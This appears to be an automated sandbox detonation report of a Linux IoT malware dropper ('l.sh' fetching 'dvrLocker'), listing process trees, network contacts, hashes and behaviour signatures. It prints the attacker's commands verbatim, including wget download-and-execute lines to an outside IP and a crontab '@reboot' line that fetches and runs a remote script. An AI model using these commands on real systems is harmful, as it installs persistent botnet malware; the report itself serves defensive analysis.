File opened for reading /proc/835/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/mounts /tmp/lib/dvrLocker N/A
File opened for reading /proc/841/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/2/cmdline /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/868/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/870/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/772/cmdline /tmp/lib/dvrLocker N/A
File opened for reading /proc/838/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/843/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/827/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/842/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/869/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/872/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/874/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/805/cmdline /tmp/lib/dvrLocker N/A
File opened for reading /proc/829/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/814/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/848/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/861/cmdline /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/845/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/852/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/856/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/813/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/810/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/1/cmdline /tmp/lib/dvrLocker N/A
File opened for reading /proc/865/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/822/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/826/status /tmp/lib/dvrLocker N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/lib/dvrLocker /tmp/l.sh N/A

Processes

/tmp/l.sh

[/tmp/l.sh]

/bin/ls

[ls -l /proc/1/exe]

/bin/ls

[ls -l /proc/10/exe]

/bin/ls

[ls -l /proc/106/exe]

/bin/ls

[ls -l /proc/108/exe]

/bin/ls

[ls -l /proc/109/exe]

/bin/ls

[ls -l /proc/11/exe]

/bin/ls

[ls -l /proc/12/exe]

/bin/ls

[ls -l /proc/13/exe]

/bin/ls

[ls -l /proc/137/exe]

/bin/ls

[ls -l /proc/14/exe]

/bin/ls

[ls -l /proc/141/exe]

/bin/ls

[ls -l /proc/146/exe]

/bin/ls

[ls -l /proc/147/exe]

/bin/ls

[ls -l /proc/15/exe]

/bin/ls

[ls -l /proc/16/exe]

/bin/ls

[ls -l /proc/167/exe]

/bin/ls

[ls -l /proc/17/exe]

/bin/ls

[ls -l /proc/18/exe]

/bin/ls

[ls -l /proc/19/exe]

/bin/ls

[ls -l /proc/2/exe]

/bin/ls

[ls -l /proc/20/exe]

/bin/ls

[ls -l /proc/200/exe]

/bin/ls

[ls -l /proc/21/exe]

/bin/ls

[ls -l /proc/219/exe]

/bin/ls

[ls -l /proc/22/exe]

/bin/ls

[ls -l /proc/23/exe]

/bin/ls

[ls -l /proc/24/exe]

/bin/ls

[ls -l /proc/25/exe]

/bin/ls

[ls -l /proc/26/exe]

/bin/ls

[ls -l /proc/268/exe]

/bin/ls

[ls -l /proc/269/exe]

/bin/ls

[ls -l /proc/27/exe]

/bin/ls

[ls -l /proc/271/exe]

/bin/ls

[ls -l /proc/273/exe]

/bin/ls

[ls -l /proc/274/exe]

/bin/ls

[ls -l /proc/28/exe]

/bin/ls

[ls -l /proc/29/exe]

/bin/ls

[ls -l /proc/3/exe]

/bin/ls

[ls -l /proc/305/exe]

/bin/ls

[ls -l /proc/308/exe]

/bin/ls

[ls -l /proc/309/exe]

/bin/ls

[ls -l /proc/321/exe]

/bin/ls

[ls -l /proc/4/exe]

/bin/ls

[ls -l /proc/41/exe]

/bin/ls

[ls -l /proc/42/exe]

/bin/ls

[ls -l /proc/43/exe]

/bin/ls

[ls -l /proc/5/exe]

/bin/ls

[ls -l /proc/573/exe]

/bin/ls

[ls -l /proc/586/exe]

/bin/ls

[ls -l /proc/591/exe]

/bin/ls

[ls -l /proc/593/exe]

/bin/ls

[ls -l /proc/594/exe]

/bin/ls

[ls -l /proc/6/exe]

/bin/ls

[ls -l /proc/625/exe]

/bin/ls

[ls -l /proc/632/exe]

/bin/ls

[ls -l /proc/633/exe]

/bin/ls

[ls -l /proc/635/exe]

/bin/ls

[ls -l /proc/637/exe]

/bin/ls

[ls -l /proc/638/exe]

/bin/ls

[ls -l /proc/639/exe]

/bin/ls

[ls -l /proc/640/exe]

/bin/ls

[ls -l /proc/7/exe]

/bin/ls

[ls -l /proc/76/exe]

/bin/ls

[ls -l /proc/8/exe]

/bin/ls

[ls -l /proc/9/exe]

/bin/ls

[ls -l /proc/98/exe]

/bin/rm

[rm -rf /tmp/lib/]

/bin/rm

[rm -rf /tmp/lib/dvrLocker]

/bin/mkdir

[mkdir /tmp/lib/]

/usr/bin/wget

[wget http://45.202.35.91/mpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mpsl]

/usr/bin/wget

[wget http://45.202.35.91/mips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mips]

/usr/bin/wget

[wget http://45.202.35.91/arm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

/bin/rm

[rm -rf arm]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm5]

/usr/bin/wget

[wget http://45.202.35.91/ppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://45.202.35.91/arm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm7]

/usr/bin/wget

[wget http://45.202.35.91/arm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm6]

/usr/bin/wget

[wget http://45.202.35.91/x86 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf /mnt/dvrLocker]

Network

Country Destination Domain Proto
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
DE 152.53.15.127:53 kingstonwikkerink.dyn udp
US 217.28.130.41:11973 kingstonwikkerink.dyn tcp
US 168.235.111.72:53 kingstonwikkerink.dyn udp
GB 91.149.238.18:8414 kingstonwikkerink.dyn tcp
CN 43.226.79.41:62371 udp

Files

/tmp/lib/dvrLocker

MD5 4ad582d49f505bfab7de84881998685b
SHA1 5f09f4baed114b594729ded91e2c4d263f0e2754
SHA256 b1e8713db49c15b272baa11e5569ecb4f22fd6064f5aa59ed236d0af58f159a1
SHA512 6f35bfb8aca5fd02f6e690fe0628595531dba7463265b1a66ff801c7744690f3317f611ab07e45fdfc28a17a32a891de92b1d026de30bf327aa304395b0905f4

/tmp/lib/dvrLocker

MD5 559f129d380ad1cfb60792c6b2dc3d32
SHA1 3997a0fc0bd5958783f1751364ec407c5b170adc
SHA256 fbdbd0392519e49a09e647d8c83046fb15d6dcbb8246ee2f813d10018ba8ac3d
SHA512 9f5c39334121b5bde6a282f47b92a841130627f1554ff5089005c371af4c2be5ddc467ad594013fa2fb70a55172b6ba7a6caf50c0cba56564170e482955dc112

/tmp/lib/dvrLocker

MD5 d09db60a70d5b53b5b53ad39476fd7e8
SHA1 73a75e5e8200f77d857a7256cc0979077e29241d
SHA256 36b5ad3793ba15e920ea49a43467610bfce85149afc12af166a56bb2011a9165
SHA512 ea6156cf3b4480fef088a1fefd8bd1845418606a412a8ab883734e2d297e6169de35456ecd2a5738967ef310066482069262171329624d28184a919cefb21c04

/var/spool/cron/crontabs/tmp.x2KALa

MD5 c8f52a3f659ca7c7be0a52692aa80acb
SHA1 1e01d51afb31de66a9a6896f490cbdc600d6fbb2
SHA256 0c4cc6adfb5874320fd772ed7dd0cfc7de1be3fa71f2514372340060dbcd0a10
SHA512 9c698983ab33f355f131c79974f0b1028a0ddb987011b14c34b2f64d56f14edc0cb7093f8b4284780b9d06234a9faa89eb25863ee873aade327f936cd04aba3f

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-09 08:41

Reported

2024-11-09 08:43

Platform

debian9-mipsbe-20240418-en

Max time kernel

106s

Max time network

142s

Command Line

[/tmp/l.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/sh N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A

Renames itself

Description Indicator Process Target
N/A N/A /tmp/lib/dvrLocker N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 202.61.197.122 N/A N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.cK7Kfe /usr/bin/crontab N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself /bin/busybox telentd /tmp/lib/dvrLocker N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/894/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/857/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/874/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/876/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/895/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/907/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/938/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/852/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/889/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/914/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/711/cmdline /tmp/lib/dvrLocker N/A
File opened for reading /proc/858/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/948/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/865/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/882/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/919/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/937/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/881/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/886/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/905/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/920/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/856/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/909/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/916/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/915/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/926/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/851/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/899/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/858/cmdline /tmp/lib/dvrLocker N/A
File opened for reading /proc/896/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/913/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/923/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/942/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/859/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/869/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/872/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/877/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/903/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/lib/dvrLocker /tmp/l.sh N/A

Processes

/tmp/l.sh

[/tmp/l.sh]

/bin/ls

[ls -l /proc/1/exe]

/bin/ls

[ls -l /proc/10/exe]

/bin/ls

[ls -l /proc/11/exe]

/bin/ls

[ls -l /proc/111/exe]

/bin/ls

[ls -l /proc/12/exe]

/bin/ls

[ls -l /proc/121/exe]

/bin/ls

[ls -l /proc/122/exe]

/bin/ls

[ls -l /proc/13/exe]

/bin/ls

[ls -l /proc/14/exe]

/bin/ls

[ls -l /proc/148/exe]

/bin/ls

[ls -l /proc/15/exe]

/bin/ls

[ls -l /proc/157/exe]

/bin/ls

[ls -l /proc/16/exe]

/bin/ls

[ls -l /proc/17/exe]

/bin/ls

[ls -l /proc/173/exe]

/bin/ls

[ls -l /proc/18/exe]

/bin/ls

[ls -l /proc/19/exe]

/bin/ls

[ls -l /proc/2/exe]

/bin/ls

[ls -l /proc/20/exe]

/bin/ls

[ls -l /proc/207/exe]

/bin/ls

[ls -l /proc/21/exe]

/bin/ls

[ls -l /proc/22/exe]

/bin/ls

[ls -l /proc/23/exe]

/bin/ls

[ls -l /proc/234/exe]

/bin/ls

[ls -l /proc/24/exe]

/bin/ls

[ls -l /proc/3/exe]

/bin/ls

[ls -l /proc/319/exe]

/bin/ls

[ls -l /proc/320/exe]

/bin/ls

[ls -l /proc/323/exe]

/bin/ls

[ls -l /proc/325/exe]

/bin/ls

[ls -l /proc/326/exe]

/bin/ls

[ls -l /proc/36/exe]

/bin/ls

[ls -l /proc/37/exe]

/bin/ls

[ls -l /proc/378/exe]

/bin/ls

[ls -l /proc/379/exe]

/bin/ls

[ls -l /proc/383/exe]

/bin/ls

[ls -l /proc/4/exe]

/bin/ls

[ls -l /proc/427/exe]

/bin/ls

[ls -l /proc/5/exe]

/bin/ls

[ls -l /proc/6/exe]

/bin/ls

[ls -l /proc/665/exe]

/bin/ls

[ls -l /proc/668/exe]

/bin/ls

[ls -l /proc/671/exe]

/bin/ls

[ls -l /proc/672/exe]

/bin/ls

[ls -l /proc/688/exe]

/bin/ls

[ls -l /proc/7/exe]

/bin/ls

[ls -l /proc/70/exe]

/bin/ls

[ls -l /proc/701/exe]

/bin/ls

[ls -l /proc/702/exe]

/bin/ls

[ls -l /proc/705/exe]

/bin/ls

[ls -l /proc/708/exe]

/bin/ls

[ls -l /proc/709/exe]

/bin/ls

[ls -l /proc/71/exe]

/bin/ls

[ls -l /proc/711/exe]

/bin/ls

[ls -l /proc/712/exe]

/bin/ls

[ls -l /proc/713/exe]

/bin/ls

[ls -l /proc/72/exe]

/bin/ls

[ls -l /proc/73/exe]

/bin/ls

[ls -l /proc/74/exe]

/bin/ls

[ls -l /proc/75/exe]

/bin/ls

[ls -l /proc/76/exe]

/bin/ls

[ls -l /proc/77/exe]

/bin/ls

[ls -l /proc/78/exe]

/bin/ls

[ls -l /proc/8/exe]

/bin/ls

[ls -l /proc/80/exe]

/bin/ls

[ls -l /proc/82/exe]

/bin/ls

[ls -l /proc/9/exe]

/bin/rm

[rm -rf /tmp/lib/]

/bin/rm

[rm -rf /tmp/lib/dvrLocker]

/bin/mkdir

[mkdir /tmp/lib/]

/usr/bin/wget

[wget http://45.202.35.91/mpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mpsl]

/usr/bin/wget

[wget http://45.202.35.91/mips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

/bin/rm

[rm -rf mips]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm]

/usr/bin/wget

[wget http://45.202.35.91/arm5 -O -]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm5]

/usr/bin/wget

[wget http://45.202.35.91/ppc -O -]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/usr/bin/wget

[wget http://45.202.35.91/arm7 -O -]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm7]

/usr/bin/wget

[wget http://45.202.35.91/arm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm6]

/usr/bin/wget

[wget http://45.202.35.91/x86 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf x86]

/bin/rm

[rm -rf /mnt/dvrLocker]

/usr/bin/wget

[wget http://45.202.35.91/mpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mpsl]

/usr/bin/wget

[wget http://45.202.35.91/mips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/usr/bin/wget

[wget http://45.202.35.91/arm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/usr/bin/wget

[wget http://45.202.35.91/arm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm5]

/usr/bin/wget

[wget http://45.202.35.91/ppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/usr/bin/wget

[wget http://45.202.35.91/arm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm7]

/usr/bin/wget

[wget http://45.202.35.91/arm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm6]

/usr/bin/wget

[wget http://45.202.35.91/x86 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf x86]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mpsl]

/usr/bin/wget

[wget http://45.202.35.91/mips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mips]

/usr/bin/wget

[wget http://45.202.35.91/arm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm]

/usr/bin/wget

[wget http://45.202.35.91/arm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm5]

/usr/bin/wget

[wget http://45.202.35.91/ppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://45.202.35.91/arm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm7]

/usr/bin/wget

[wget http://45.202.35.91/arm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm6]

/usr/bin/wget

[wget http://45.202.35.91/x86 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf x86]

Network

Country Destination Domain Proto
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
DE 202.61.197.122:53 kingstonwikkerink.dyn udp
HK 193.233.193.45:23655 kingstonwikkerink.dyn tcp
CN 43.226.79.41:62371 udp

Files

/tmp/lib/dvrLocker

MD5 4ad582d49f505bfab7de84881998685b
SHA1 5f09f4baed114b594729ded91e2c4d263f0e2754
SHA256 b1e8713db49c15b272baa11e5569ecb4f22fd6064f5aa59ed236d0af58f159a1
SHA512 6f35bfb8aca5fd02f6e690fe0628595531dba7463265b1a66ff801c7744690f3317f611ab07e45fdfc28a17a32a891de92b1d026de30bf327aa304395b0905f4

/tmp/lib/dvrLocker

MD5 559f129d380ad1cfb60792c6b2dc3d32
SHA1 3997a0fc0bd5958783f1751364ec407c5b170adc
SHA256 fbdbd0392519e49a09e647d8c83046fb15d6dcbb8246ee2f813d10018ba8ac3d
SHA512 9f5c39334121b5bde6a282f47b92a841130627f1554ff5089005c371af4c2be5ddc467ad594013fa2fb70a55172b6ba7a6caf50c0cba56564170e482955dc112

/var/spool/cron/crontabs/tmp.cK7Kfe

MD5 e728bc24eeb3365830019d50d1e8e05c
SHA1 b25cfd9ccb191711a43aa90e55eeea2f1e31ea0f
SHA256 68c667810359171e53c51f4d00de87821381491fbcaf7b97784cdb0fad788966
SHA512 64ac0e01cd92073612b5e679daea6fcfc049f7e651047ac0d187387752fbf66551203e14e16fe6986f8ce7e53f3c9a3728dcbb996cdfdfcfeb4248328056ba73

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-09 08:41

Reported

2024-11-09 08:44

Platform

debian9-mipsel-20240611-en

Max time kernel

60s

Max time network

154s

Command Line

[/tmp/l.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/sh N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A

Renames itself

Description Indicator Process Target
N/A N/A /tmp/lib/dvrLocker N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 80.152.203.134 N/A N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.u40wTl /usr/bin/crontab N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself /bin/busybox telentd /tmp/lib/dvrLocker N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/827/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/829/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/835/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/837/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/849/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/873/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/920/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/924/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/926/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/822/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/856/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/862/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/828/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/860/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/824/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/901/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/891/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
